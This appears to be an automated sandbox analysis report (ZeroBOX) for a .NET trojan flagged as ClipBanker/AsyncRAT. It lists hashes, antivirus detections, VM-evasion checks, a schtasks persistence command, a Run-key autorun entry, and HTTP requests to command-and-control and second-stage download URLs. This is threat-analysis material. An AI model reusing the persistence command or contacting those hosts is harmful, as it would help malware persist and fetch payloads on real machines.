Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Sept. 15, 2021, 9:24 a.m.	Sept. 15, 2021, 9:34 a.m.

Size	1.2MB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`03fa2aa90ad1ce098de68893d83f701d`
SHA256	`f58d2071a2fdaea27d814e788e002fe5da63843546f22c255eceade162323ce1`
CRC32	`FF6DA895`
ssdeep	`12288:e5EzeaAcdXmZM1KNrtTCXSnny5doEqXfei/ElljPFnF42s2Bx0teS:0244/gPHoIuS`
Yara	Malicious_Packer_Zero - Malicious Packer PE_Header_Zero - PE File Signature Generic_Malware_Zero - Generic Malware OS_Processor_Check_Zero - OS Processor Check Is_DotNET_EXE - (no description) Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT IsPE32 - (no description) Win32_Trojan_PWS_Net_1_Zero - Win32 Trojan PWS .NET Azorult NPKI_Zero - File included NPKI

slFZvqw6JB8bsDt.exe "C:\Users\test22\AppData\Local\Temp\slFZvqw6JB8bsDt.exe"
1116
- WindowsPortableDevices.exe "C:\Users\test22\AppData\Local\Windows Portable Devices ver3.40\WindowsPortableDevices.exe"
  2164
  - schtasks.exe "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /tn "Skrinshoter ver0.19" /tr "'C:\Users\test22\AppData\Local\Windows Portable Devices ver3.40\WindowsPortableDevices.exe"'/f
    2560

Name	Response	Post-Analysis Lookup
qjqpqiamh2.eternalhost.info	A 194.61.0.8	194.61.0.8
sherence.ru	A 172.67.176.114 A 104.21.48.37	104.21.48.37

IP Address	Status	Action
104.21.48.37	Active	Moloch
164.124.101.2	Active	Moloch
194.61.0.8	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 104.21.48.37:80 -> 192.168.56.101:49205	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 104.21.48.37:80 -> 192.168.56.101:49205	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 192.168.56.101:49203 -> 194.61.0.8:80	2022818	ET MALWARE Generic gate[.].php GET with minimal headers	A Network Trojan was detected
TCP 192.168.56.101:49203 -> 194.61.0.8:80	2030802	ET HUNTING Suspicious GET To gate.php with no Referer	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW Sept. 15, 2021, 9:24 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 15, 2021, 9:32 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 15, 2021, 9:32 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 15, 2021, 9:32 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 15, 2021, 9:32 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 15, 2021, 9:32 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (4 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 15, 2021, 9:24 a.m.			0	0
IsDebuggerPresent Sept. 15, 2021, 9:24 a.m.			0	0
IsDebuggerPresent Sept. 15, 2021, 9:32 a.m.			0	0
IsDebuggerPresent Sept. 15, 2021, 9:32 a.m.			0	0

Command line console output was observed (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW Sept. 15, 2021, 9:32 a.m.	buffer: SUCCESS: The scheduled task "Skrinshoter ver0.19" has successfully been created. console_handle: 0x0000000000000007	1	1	0

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 15, 2021, 9:24 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (4 events)

suspicious_features	GET method with no useragent header	suspicious_request	GET http://qjqpqiamh2.eternalhost.info//cisCheckerstroke.php
suspicious_features	GET method with no useragent header	suspicious_request	GET http://qjqpqiamh2.eternalhost.info//gate.php?hwid=7C6024AD&os=6.1.7601&av=
suspicious_features	GET method with no useragent header	suspicious_request	GET http://qjqpqiamh2.eternalhost.info//loader.txt
suspicious_features	GET method with no useragent header	suspicious_request	GET http://sherence.ru/12332123331.exe

Performs some HTTP requests (4 events)

request	GET http://qjqpqiamh2.eternalhost.info//cisCheckerstroke.php
request	GET http://qjqpqiamh2.eternalhost.info//gate.php?hwid=7C6024AD&os=6.1.7601&av=
request	GET http://qjqpqiamh2.eternalhost.info//loader.txt
request	GET http://sherence.ru/12332123331.exe

Allocates read-write-execute memory (usually to unpack itself) (50 out of 119 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Sept. 15, 2021, 9:24 a.m.	process_identifier: 1116 region_size: 1900544 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000730000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 15, 2021, 9:24 a.m.	process_identifier: 1116 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000880000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 15, 2021, 9:24 a.m.	process_identifier: 1116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1321000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 15, 2021, 9:24 a.m.	process_identifier: 1116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef19bb000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 15, 2021, 9:24 a.m.	process_identifier: 1116 region_size: 1703936 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000c20000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 15, 2021, 9:24 a.m.	process_identifier: 1116 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000d40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 15, 2021, 9:24 a.m.	process_identifier: 1116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 15, 2021, 9:24 a.m.	process_identifier: 1116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 15, 2021, 9:24 a.m.	process_identifier: 1116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 15, 2021, 9:24 a.m.	process_identifier: 1116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 15, 2021, 9:24 a.m.	process_identifier: 1116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 15, 2021, 9:24 a.m.	process_identifier: 1116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 15, 2021, 9:24 a.m.	process_identifier: 1116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 15, 2021, 9:24 a.m.	process_identifier: 1116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 15, 2021, 9:24 a.m.	process_identifier: 1116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 15, 2021, 9:24 a.m.	process_identifier: 1116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 15, 2021, 9:24 a.m.	process_identifier: 1116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1322000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 15, 2021, 9:24 a.m.	process_identifier: 1116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1324000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 15, 2021, 9:24 a.m.	process_identifier: 1116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1324000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 15, 2021, 9:24 a.m.	process_identifier: 1116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1324000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 15, 2021, 9:24 a.m.	process_identifier: 1116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1324000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 15, 2021, 9:24 a.m.	process_identifier: 1116 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 15, 2021, 9:24 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 15, 2021, 9:24 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 15, 2021, 9:24 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 15, 2021, 9:24 a.m.	process_identifier: 1116 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 15, 2021, 9:24 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 15, 2021, 9:24 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b8a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 15, 2021, 9:24 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b9c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 15, 2021, 9:24 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c3c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 15, 2021, 9:24 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c66000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 15, 2021, 9:24 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91c40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 15, 2021, 9:24 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91cb0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 15, 2021, 9:24 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b8b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 15, 2021, 9:24 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91bab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 15, 2021, 9:24 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b9a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 15, 2021, 9:24 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91bdc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 15, 2021, 9:24 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91bad000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 15, 2021, 9:24 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b82000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 15, 2021, 9:24 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91cb1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 15, 2021, 9:24 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91cf0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 15, 2021, 9:24 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91cb2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 15, 2021, 9:24 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91cf1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 15, 2021, 9:24 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91b9b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 15, 2021, 9:24 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe91cf2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 15, 2021, 9:32 a.m.	process_identifier: 2164 region_size: 917504 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000690000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 15, 2021, 9:32 a.m.	process_identifier: 2164 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000006f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 15, 2021, 9:32 a.m.	process_identifier: 2164 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef1321000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Sept. 15, 2021, 9:32 a.m.	process_identifier: 2164 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef19bb000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Sept. 15, 2021, 9:32 a.m.	process_identifier: 2164 region_size: 1441792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002150000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (2 events)

Time & API	Arguments	Status	Return	Repeated
GetDiskFreeSpaceExW Sept. 15, 2021, 9:24 a.m.	total_number_of_free_bytes: 13725687808 free_bytes_available: 13725687808 root_path: C:\ total_number_of_bytes: 34252779520	1	1	0
GetDiskFreeSpaceExW Sept. 15, 2021, 9:32 a.m.	total_number_of_free_bytes: 13044764672 free_bytes_available: 13044764672 root_path: C:\ total_number_of_bytes: 34252779520	1	1	0

Creates executable files on the filesystem (2 events)

file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Vlqukd.exe
file	C:\Users\test22\AppData\Local\Windows Portable Devices ver3.40\WindowsPortableDevices.exe

Creates a suspicious process (2 events)

cmdline	"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /tn "Skrinshoter ver0.19" /tr "'C:\Users\test22\AppData\Local\Windows Portable Devices ver3.40\WindowsPortableDevices.exe"'/f
cmdline	schtasks.exe /create /sc MINUTE /mo 1 /tn "Skrinshoter ver0.19" /tr "'C:\Users\test22\AppData\Local\Windows Portable Devices ver3.40\WindowsPortableDevices.exe"'/f

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Windows Portable Devices ver3.40\WindowsPortableDevices.exe

Drops an executable to the user AppData folder (2 events)

file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Vlqukd.exe
file	C:\Users\test22\AppData\Local\Windows Portable Devices ver3.40\WindowsPortableDevices.exe

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Sept. 15, 2021, 9:32 a.m.	show_type: 0 filepath_r: schtasks.exe parameters: /create /sc MINUTE /mo 1 /tn "Skrinshoter ver0.19" /tr "'C:\Users\test22\AppData\Local\Windows Portable Devices ver3.40\WindowsPortableDevices.exe"'/f filepath: schtasks.exe	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Sept. 15, 2021, 9:32 a.m.	flags: 15 family: 0		111	0

An executable file was downloaded by the process windowsportabledevices.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
recv Sept. 15, 2021, 9:33 a.m.	buffer: HTTP/1.1 200 OK Date: Wed, 15 Sep 2021 00:33:02 GMT Content-Type: application/x-msdos-program Content-Length: 11462144 Connection: keep-alive last-modified: Sat, 11 Sep 2021 11:05:57 GMT etag: "aee600-5cbb637614dcc" Cache-Control: max-age=14400 CF-Cache-Status: MISS Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FGFmnTxJcXs2tp6KQ3Bxjnlv4XorfFX1GIlfXQOkt5%2FNsITcg1s5oqQmP4QrwELFsOrJXbZYlVsDF52mGy4PX7hEy2L26SeWF9S79Yr2Y8L3yPmHE4MmFQ5%2FyYKzaw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 68edc2de8804fcc9-KIX alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL6¶à0Ü®û® ¯@ @¯@4û®W¯ ¯ H.textÛ® Ü® `.rsrc¯Þ®@@.reloc ¯ä®@Bpû®HÓ¬$(¸\|ºª ¿ëVûÍ;²$0¥xC=VDÒb¹ÔñçæÃ9ALÌ,¬lì\Ü<¼\|üBÂ"¢bâRÒ2²rò JÊ*ªjêZÚ:ºzúFÆ&¦fæVÖ6¶vöNÎ.®nî^Þ>¾~þAÁ!¡aáQÑ1±qñ IÉ)©iéYÙ9¹yùEÅ%¥eåUÕ5µuõ MÍ-mí]Ý=½}ý S S Ó Ó 3 3 ³ ³ s s ó ó K K Ë Ë + + « « k k ë ë [ [ Û Û ; ; » » { { û û G G Ç Ç ' ' § § g g ç ç W W × × 7 7 · · w w ÷ ÷ O O Ï Ï / / ¯ ¯ o o ï ï _ _ ß ß ? ? ¿ ¿ ÿ ÿ @ `P0pH(hX8xD$dT4tCÃ#£cã received: 2920 socket: 1120	1	2920	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Sept. 15, 2021, 9:24 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /tn "Skrinshoter ver0.19" /tr "'C:\Users\test22\AppData\Local\Windows Portable Devices ver3.40\WindowsPortableDevices.exe"'/f
cmdline	schtasks.exe /create /sc MINUTE /mo 1 /tn "Skrinshoter ver0.19" /tr "'C:\Users\test22\AppData\Local\Windows Portable Devices ver3.40\WindowsPortableDevices.exe"'/f

Installs itself for autorun at Windows startup (3 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\F7oHH-	reg_value	C:\Users\test22\AppData\Local\Windows Portable Devices ver3.40\WindowsPortableDevices.exe
cmdline	"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /tn "Skrinshoter ver0.19" /tr "'C:\Users\test22\AppData\Local\Windows Portable Devices ver3.40\WindowsPortableDevices.exe"'/f
cmdline	schtasks.exe /create /sc MINUTE /mo 1 /tn "Skrinshoter ver0.19" /tr "'C:\Users\test22\AppData\Local\Windows Portable Devices ver3.40\WindowsPortableDevices.exe"'/f

A process performed obfuscation on information about the computer or sent it to a remote location indicative of CnC Traffic/Preperations. (3 events)

Time & API	Arguments	Status	Return
CryptHashData Sept. 15, 2021, 9:24 a.m.	buffer: 127631360test22TEST22-PCMicrosoft Windows NT 6.1.7601 Service Pack 134252779520 hash_handle: 0x00000000004de370 flags: 0	1	1
CryptHashData Sept. 15, 2021, 9:32 a.m.	buffer: 127631360test22TEST22-PCMicrosoft Windows NT 6.1.7601 Service Pack 134252779520 hash_handle: 0x00000000000f5090 flags: 0	1	1
CryptHashData Sept. 15, 2021, 9:32 a.m.	buffer: 127631360test22TEST22-PCMicrosoft Windows NT 6.1.7601 Service Pack 134252779520 hash_handle: 0x00000000000f5090 flags: 0	1	1

File has been identified by 25 AntiVirus engines on VirusTotal as malicious (25 events)

Elastic	malicious (high confidence)
DrWeb	Trojan.ClipBankerNET.19
MicroWorld-eScan	IL:Trojan.MSILZilla.1643
FireEye	Generic.mg.03fa2aa90ad1ce09
McAfee	Artemis!03FA2AA90AD1
Cylance	Unsafe
Sangfor	Suspicious.Win32.Save.a
CrowdStrike	win/malicious_confidence_80% (D)
BitDefenderTheta	Gen:NN.ZemsilF.34142.nn0@aShHeAl
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of MSIL/ClipBanker.QS
APEX	Malicious
Kaspersky	HEUR:Trojan.MSIL.Bingoml.gen
BitDefender	IL:Trojan.MSILZilla.1643
Ad-Aware	IL:Trojan.MSILZilla.1643
Emsisoft	IL:Trojan.MSILZilla.1643 (B)
SentinelOne	Static AI - Malicious PE
Avira	TR/ATRAPS.Gen
MAX	malware (ai score=88)
Microsoft	Trojan:Win32/Sabsik.FL.B!ml
GData	IL:Trojan.MSILZilla.1643
Cynet	Malicious (score: 100)
ALYac	IL:Trojan.MSILZilla.1643
Malwarebytes	MachineLearning/Anomalous.95%
Cybereason	malicious.90ad1c

slFZvqw6JB8bsDt.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All